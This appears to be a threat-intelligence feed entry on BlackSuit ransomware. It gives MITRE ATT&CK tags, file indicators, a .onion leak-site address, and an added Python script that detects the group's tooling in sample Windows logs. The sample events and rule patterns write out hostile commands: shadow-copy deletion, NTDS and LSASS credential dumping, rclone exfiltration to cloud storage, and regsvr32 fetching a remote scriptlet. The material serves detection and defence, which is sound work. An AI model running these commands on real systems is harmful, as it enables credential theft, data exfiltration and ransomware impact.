Ignoble Scorpius, Distributors of BlackSuit Ransomware | #ransomware | #cybercrime | National Cyber Security Consulting
Tags
cmtmf-attack-pattern: Application Layer Protocol; Command And Scripting Interpreter; Obfuscated Files Or Information
country: Japan; United States Of America
maec-delivery-vectors: Watering Hole
attack-pattern: Data Direct; Adversary-In-The-Middle - T1638; Adversary-In-The-Middle - T1557; Application Layer Protocol - T1437; Command And Scripting Interpreter - T1623; Compromise Software Supply Chain - T1195.002; Credentials - T1589.001; Data Encrypted For Impact - T1471; Data Encrypted For Impact - T1486; Dcsync - T1003.006; Disable Or Modify Tools - T1562.001; Exfiltration Over Web Service - T1567; Exfiltration To Cloud Storage - T1567.002; Inhibit System Recovery - T1490; Javascript - T1059.007; Lateral Tool Transfer - T1570; Lsass Memory - T1003.001; Malware - T1587.001; Malware - T1588.001; Obfuscated Files Or Information - T1406; Ntds - T1003.003; Phishing - T1660; Phishing - T1566; Powershell - T1059.001; Regsvr32 - T1218.010; Remote Desktop Protocol - T1021.001; Run Virtual Instance - T1564.006; Rundll32 - T1218.011; Seo Poisoning - T1608.006; Server - T1583.004; Server - T1584.004; Silver Ticket - T1558.002; Smb/Windows Admin Shares - T1021.002; Software - T1592.002; Spearphishing Attachment - T1566.001; Spearphishing Voice - T1566.004; Tool - T1588.002; Standard Application Layer Protocol - T1071; Command-Line Interface - T1059; Credential Dumping - T1003; Exfiltration Over Alternative Protocol - T1048; File And Directory Discovery - T1083; Obfuscated Files Or Information - T1027; Powershell - T1086; Process Discovery - T1057; Rundll32 - T1085; Windows Management Instrumentation - T1047; Valid Accounts - T1078
Common Information
Type Value
UUID fcfb40d4-4767-44ba-8bcb-f73b95aeb5a9
Fingerprint ac37095905a5c441
Analysis status DONE
Considered CTI value 2
Text language
Published Nov. 20, 2024, 1:22 p.m.
Added to db Nov. 20, 2024, 4:31 p.m.
Last updated Nov. 20, 2024, 9:29 p.m.
Headline Ignoble Scorpius, Distributors of BlackSuit Ransomware | #ransomware | #cybercrime
Title Ignoble Scorpius, Distributors of BlackSuit Ransomware | #ransomware | #cybercrime | National Cyber Security Consulting
Detected Hints/Tags/Attributes 158/4/48
RSS Feed
Id: 6
Feed title: National Cyber Security Consulting
Url: http://nationalcybersecurity.com/feed/
Added to db: 2024-08-30 22:08
Attributes
Type                      #Events  Value
Domain                    3        weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd.onion
File                      1127     svchost.exe
File                      18       rstrtmgr.dll
File                      1265     explorer.exe
File                      38       rclone.exe
File                      380      wscript.exe
File                      39       lsass.dmp
File                      118      taskmgr.exe
File                      143      wmiprvse.exe
File                      308      services.exe
File                      1214     powershell.exe
File                      61       ntdsutil.exe
File                      128      c:\windows\system32\rundll32.exe
File                      19       c:\windows\syswow64\rundll32.exe
File                      209      setup.exe
File                      2136     cmd.exe
File                      347      vssadmin.exe
File                      1        enum.sys
File                      11       blacksuit.txt
MITRE ATT&CK Techniques   312      T1566.001
MITRE ATT&CK Techniques   13       T1608.006
MITRE ATT&CK Techniques   310      T1078
MITRE ATT&CK Techniques   4        T1566.004
MITRE ATT&CK Techniques   37       T1195.002
MITRE ATT&CK Techniques   175      T1003.001
MITRE ATT&CK Techniques   28       T1003.006
MITRE ATT&CK Techniques   22       T1557
MITRE ATT&CK Techniques   1        T1558.002
MITRE ATT&CK Techniques   69       T1003.003
MITRE ATT&CK Techniques   162      T1021.001
MITRE ATT&CK Techniques   141      T1021.002
MITRE ATT&CK Techniques   119      T1570
MITRE ATT&CK Techniques   300      T1562.001
MITRE ATT&CK Techniques   94       T1048
MITRE ATT&CK Techniques   127      T1567
MITRE ATT&CK Techniques   102      T1567.002
MITRE ATT&CK Techniques   435      T1057
MITRE ATT&CK Techniques   277      T1490
MITRE ATT&CK Techniques   5        T1564.006
MITRE ATT&CK Techniques   312      T1047
MITRE ATT&CK Techniques   45       T1218.010
MITRE ATT&CK Techniques   588      T1083
MITRE ATT&CK Techniques   477      T1486
MITRE ATT&CK Techniques   95       T1059.007
MITRE ATT&CK Techniques   465      T1059.001
MITRE ATT&CK Techniques   449      T1071
MITRE ATT&CK Techniques   632      T1027
Url                       1        http://weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd.onion/?id=[id]
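The file names and technique IDs in the attributes table are most useful when joined: vssadmin.exe with Inhibit System Recovery (T1490), ntdsutil.exe with NTDS (T1003.003), rundll32.exe and lsass.dmp with LSASS Memory (T1003.001), rclone.exe with Exfiltration To Cloud Storage (T1567.002), cmd.exe and setup.exe with Lateral Tool Transfer (T1570) over admin shares, wscript.exe with JavaScript (T1059.007), regsvr32.exe with T1218.010. The script below is an added example, not code from the original page or from the report it aggregates: it runs that pairing as detection rules over Windows process-creation events. The "Key: value | Key: value" log format, the sample events, and every host, user and path in them are constructed for the demo; the command-line patterns are the common invocations of those binaries, not strings quoted by the page.

```python
"""Triage Windows process-creation events against the BlackSuit tooling listed above.

Added example, not code from the original page or the report it aggregates.
The rules tie the binaries the page lists (vssadmin.exe, ntdsutil.exe,
rundll32.exe, rclone.exe, cmd.exe, wscript.exe, regsvr32.exe) to the ATT&CK
IDs it tags; the 'Key: value | Key: value' log format and the sample events
are constructed for this demo.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str  # ATT&CK ID as tagged on the page
    image: str      # executable basename, compared case-insensitively
    pattern: str    # regex over CommandLine; empty string means any invocation
    note: str


RULES = [
    Rule("T1490", "vssadmin.exe", r"delete\s+shadows",
         "shadow copy deletion, typically right before encryption"),
    Rule("T1003.003", "ntdsutil.exe", r"\bifm\b",
         "NTDS.dit copy via ntdsutil 'ifm' (Install From Media)"),
    Rule("T1003.001", "rundll32.exe", r"comsvcs\.dll.*minidump",
         "LSASS dump through comsvcs.dll MiniDump (rundll32 proxy, T1218.011)"),
    Rule("T1567.002", "rclone.exe", r"",
         "any rclone run: bulk copy to cloud storage"),
    Rule("T1570", "cmd.exe", r"\bcopy\b.*\\\\[^\\]+\\(?:c|admin)\$",
         "file copy to a remote admin share (SMB, T1021.002)"),
    Rule("T1059.007", "wscript.exe", r"\.jse?\b",
         "JScript dropper run by wscript"),
    Rule("T1218.010", "regsvr32.exe", r"/i:|scrobj\.dll",
         "regsvr32 scriptlet proxy execution"),
]


def parse_event(line: str) -> dict:
    """Split one 'Key: value | Key: value' line into a dict (constructed format)."""
    event = {}
    for field in line.split(" | "):
        key, _, value = field.partition(": ")
        event[key.strip()] = value.strip()
    return event


def match_event(event: dict) -> list:
    """Return (technique, image, note) for every rule the event satisfies."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "")
    hits = []
    for rule in RULES:
        if image != rule.image:
            continue
        if rule.pattern and not re.search(rule.pattern, cmdline, re.IGNORECASE):
            continue
        hits.append((rule.technique, image, rule.note))
    return hits


def triage(lines) -> list:
    """Run every rule over every log line, preserving log order."""
    findings = []
    for line in lines:
        findings.extend(match_event(parse_event(line)))
    return findings


# Constructed sample events; hosts, users and paths are made up for the demo.
SAMPLE_LOG = [
    r"Image: C:\Windows\System32\vssadmin.exe | CommandLine: vssadmin.exe delete shadows /all /quiet | User: CORP\svc_backup",
    r'Image: C:\Windows\System32\ntdsutil.exe | CommandLine: ntdsutil.exe "ac i ntds" "ifm" "create full C:\temp\ntds" q q | User: CORP\da_admin',
    r"Image: C:\Windows\System32\rundll32.exe | CommandLine: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full | User: CORP\da_admin",
    r"Image: C:\Windows\explorer.exe | CommandLine: C:\Windows\explorer.exe | User: CORP\alice",
    r"Image: C:\Users\alice\AppData\Local\Temp\rclone.exe | CommandLine: rclone.exe copy C:\Shares\Finance mega:exfil --transfers 16 | User: CORP\alice",
    r"Image: C:\Windows\System32\cmd.exe | CommandLine: cmd.exe /c copy C:\temp\setup.exe \\10.0.0.5\C$\Windows\Temp\setup.exe | User: CORP\da_admin",
    r"Image: C:\Windows\System32\wscript.exe | CommandLine: wscript.exe C:\Users\alice\Downloads\invoice.js | User: CORP\alice",
    r"Image: C:\Windows\System32\regsvr32.exe | CommandLine: regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll | User: CORP\alice",
]

if __name__ == "__main__":
    for technique, image, note in triage(SAMPLE_LOG):
        print(f"{technique:<10} {image:<14} {note}")
```

The benign explorer.exe event produces no finding, and `vssadmin list shadows` is deliberately not matched, since only the delete form is the T1490 signal. Two of the page's artefacts need a different event source than this script consumes: an lsass.dmp written by taskmgr.exe carries no tell-tale command line and is best caught on the file-creation event for the dump path, and the rundll32.exe entries under both system32 and syswow64 are why the rules compare basenames rather than full paths.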